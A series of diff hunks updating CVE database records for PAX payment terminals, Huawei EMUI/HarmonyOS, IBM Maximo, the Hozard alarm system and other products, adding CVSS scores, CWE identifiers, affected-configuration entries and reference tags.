"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_max:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8612B592-DFE4-4B66-B24D-71EEA747FAA2"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:d190:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DB9483F8-5201-4F31-9F9A-F00A48C4C972"
}
]
}
]
}
],
"references": [
{
"url": "https://blog.stmcyber.com/pax-pos-cves-2023/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://ppn.paxengine.com/release/development",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Permissions Required"
]
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-42137",
"sourceIdentifier": "cvd@cert.pl",
"published": "2024-01-15T14:15:24.900",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:21:06.650",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -39,6 +59,16 @@
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-59"
}
]
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -50,22 +80,261 @@
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a6650:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C020172-6E0C-4265-B4C9-ED93C84FE8AA"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFCD5218-5AA0-4086-926C-3EAEE1E43136"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a77:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0390BD9D-1FF7-456E-9394-34F009DE82CF"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D351F870-D43F-48B4-B2AC-0FDDD7B82ED4"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_max:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8612B592-DFE4-4B66-B24D-71EEA747FAA2"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:d190:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DB9483F8-5201-4F31-9F9A-F00A48C4C972"
}
]
}
]
}
],
"references": [
{
"url": "https://blog.stmcyber.com/pax-pos-cves-2023/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://ppn.paxengine.com/release/development",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Permissions Required"
]
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-43985",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.317",
"lastModified": "2024-01-19T14:15:12.317",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -2,8 +2,8 @@
"id": "CVE-2023-44112",
"sourceIdentifier": "psirt@huawei.com",
"published": "2024-01-16T08:15:08.467",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:10:25.587",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,8 +14,41 @@
"value": "Vulnerabilidad de acceso fuera de los l\u00edmites en el m\u00f3dulo de autenticaci\u00f3n del dispositivo. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-125"
}
]
},
{
"source": "psirt@huawei.com",
"type": "Secondary",
@ -27,14 +60,72 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:11.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "511F8CE2-C2B6-4A08-B992-49D9B75B8655"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:12.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A974CA73-84E8-480B-BB4C-4A81D0C985B2"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:2.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "20112231-B840-44D3-A061-B9B9F80EE378"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:2.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C01447F1-7F58-4AE3-B403-C01B2575D898"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545"
}
]
}
]
}
],
"references": [
{
"url": "https://consumer.huawei.com/en/support/bulletin/2024/1/",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
},
{
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-44117",
"sourceIdentifier": "psirt@huawei.com",
"published": "2024-01-16T08:15:08.573",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:11:54.657",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,8 +14,41 @@
"value": "Vulnerabilidad de relaciones de confianza siendo inexactas en escenarios distribuidos. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad del servicio."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
},
{
"source": "psirt@huawei.com",
"type": "Secondary",
@ -27,14 +60,52 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545"
}
]
}
]
}
],
"references": [
{
"url": "https://consumer.huawei.com/en/support/bulletin/2024/1/",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
},
{
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-4566",
"sourceIdentifier": "psirt@huawei.com",
"published": "2024-01-16T08:15:08.670",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:12:13.313",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,8 +14,41 @@
"value": "Vulnerabilidad de relaciones de confianza siendo inexactas en escenarios distribuidos. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad del servicio."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
},
{
"source": "psirt@huawei.com",
"type": "Secondary",
@ -27,14 +60,52 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545"
}
]
}
]
}
],
"references": [
{
"url": "https://consumer.huawei.com/en/support/bulletin/2024/1/",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
},
{
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
}
]
}


@ -2,7 +2,7 @@
"id": "CVE-2023-46219",
"sourceIdentifier": "support@hackerone.com",
"published": "2023-12-12T02:15:06.990",
"lastModified": "2023-12-24T13:15:08.290",
"lastModified": "2024-01-19T16:15:09.430",
"vulnStatus": "Modified",
"descriptions": [
{
@ -107,6 +107,10 @@
"Third Party Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0007/",
"source": "support@hackerone.com"
},
{
"url": "https://www.debian.org/security/2023/dsa-5587",
"source": "support@hackerone.com"


@ -2,8 +2,8 @@
"id": "CVE-2023-46351",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.367",
"lastModified": "2024-01-19T14:15:12.367",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -2,8 +2,8 @@
"id": "CVE-2023-47701",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2023-12-04T01:15:12.340",
"lastModified": "2023-12-07T17:35:00.827",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:09.547",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -144,6 +144,10 @@
"Vendor Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0001/",
"source": "psirt@us.ibm.com"
},
{
"url": "https://www.ibm.com/support/pages/node/7087180",
"source": "psirt@us.ibm.com",


@ -2,12 +2,16 @@
"id": "CVE-2023-47718",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2024-01-19T02:15:07.757",
"lastModified": "2024-01-19T02:15:07.757",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "IBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843."
},
{
"lang": "es",
"value": "IBM Maximo Asset Management 7.6.1.3 y Manage Component 8.10 a 8.11 son vulnerables a cross-site request forgery, lo que podr\u00eda permitir a un atacante ejecutar acciones maliciosas y no autorizadas transmitidas por un usuario en el que conf\u00eda el sitio web. ID de IBM X-Force: 271843."
}
],
"metrics": {


@ -2,8 +2,8 @@
"id": "CVE-2023-4818",
"sourceIdentifier": "cvd@cert.pl",
"published": "2024-01-15T14:15:25.180",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:35:49.683",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,8 +14,41 @@
"value": "El dispositivo PAX A920 permite degradar el gestor de arranque debido a un error en la verificaci\u00f3n de versi\u00f3n. La firma est\u00e1 correctamente comprobada y s\u00f3lo se puede utilizar el gestor de arranque firmado por PAX. El atacante debe tener acceso USB f\u00edsico al dispositivo para poder aprovechar esta vulnerabilidad."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "PHYSICAL",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.6,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 0.9,
"impactScore": 6.0
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-74"
}
]
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -27,22 +60,64 @@
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:7.1.2_aquarius_11.1.50_20230614:*:*:*:*:*:*:*",
"matchCriteriaId": "034C08E1-1DEB-43D2-A38A-736E1FEDE45C"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D351F870-D43F-48B4-B2AC-0FDDD7B82ED4"
}
]
}
]
}
],
"references": [
{
"url": "https://blog.stmcyber.com/pax-pos-cves-2023/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://ppn.paxengine.com/release/development",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Permissions Required"
]
}
]
}


@ -2,7 +2,7 @@
"id": "CVE-2023-49285",
"sourceIdentifier": "security-advisories@github.com",
"published": "2023-12-04T23:15:27.007",
"lastModified": "2024-01-09T02:15:44.903",
"lastModified": "2024-01-19T16:15:09.653",
"vulnStatus": "Modified",
"descriptions": [
{
@ -145,6 +145,10 @@
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/",
"source": "security-advisories@github.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0004/",
"source": "security-advisories@github.com"
}
]
}


@ -2,7 +2,7 @@
"id": "CVE-2023-49286",
"sourceIdentifier": "security-advisories@github.com",
"published": "2023-12-04T23:15:27.243",
"lastModified": "2024-01-09T02:15:45.030",
"lastModified": "2024-01-19T16:15:09.793",
"vulnStatus": "Modified",
"descriptions": [
{
@ -139,6 +139,10 @@
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/",
"source": "security-advisories@github.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0004/",
"source": "security-advisories@github.com"
}
]
}


@ -2,7 +2,7 @@
"id": "CVE-2023-49288",
"sourceIdentifier": "security-advisories@github.com",
"published": "2023-12-04T23:15:27.477",
"lastModified": "2023-12-29T03:15:11.580",
"lastModified": "2024-01-19T16:15:09.930",
"vulnStatus": "Modified",
"descriptions": [
{
@ -104,6 +104,10 @@
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/",
"source": "security-advisories@github.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0006/",
"source": "security-advisories@github.com"
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-50028",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.413",
"lastModified": "2024-01-19T14:15:12.413",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -2,8 +2,8 @@
"id": "CVE-2023-50030",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.453",
"lastModified": "2024-01-19T14:15:12.453",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -2,8 +2,8 @@
"id": "CVE-2023-50123",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-11T21:15:10.573",
"lastModified": "2024-01-12T13:47:31.250",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:10:06.827",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,11 +14,67 @@
"value": "El n\u00famero de intentos para desarmar Hozard Alarm system (alarmsystemen) v1.0 no est\u00e1 limitado. Esto podr\u00eda permitir a un atacante realizar una fuerza bruta en la autenticaci\u00f3n por SMS para desarmar el sistema de alarma."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-307"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:hozard:alarm_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8F9A297A-6C1D-4276-8153-C23EE75FB0BB"
}
]
}
]
}
],
"references": [
{
"url": "https://www.secura.com/services/iot/consumer-products/security-concerns-in-popular-smart-home-devices",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-50125",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-11T21:15:10.680",
"lastModified": "2024-01-12T13:47:31.250",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:32:56.977",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,11 +14,66 @@
"value": "Una contrase\u00f1a de ingeniero predeterminada establecida en Hozard alarm system (Alarmsysteem) v1.0 permite a un atacante desarmar el sistema de alarma."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-522"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:hozard:alarm_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8F9A297A-6C1D-4276-8153-C23EE75FB0BB"
}
]
}
]
}
],
"references": [
{
"url": "https://www.secura.com/services/iot/consumer-products/security-concerns-in-popular-smart-home-devices",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
]
}
]
}


@ -2,8 +2,8 @@
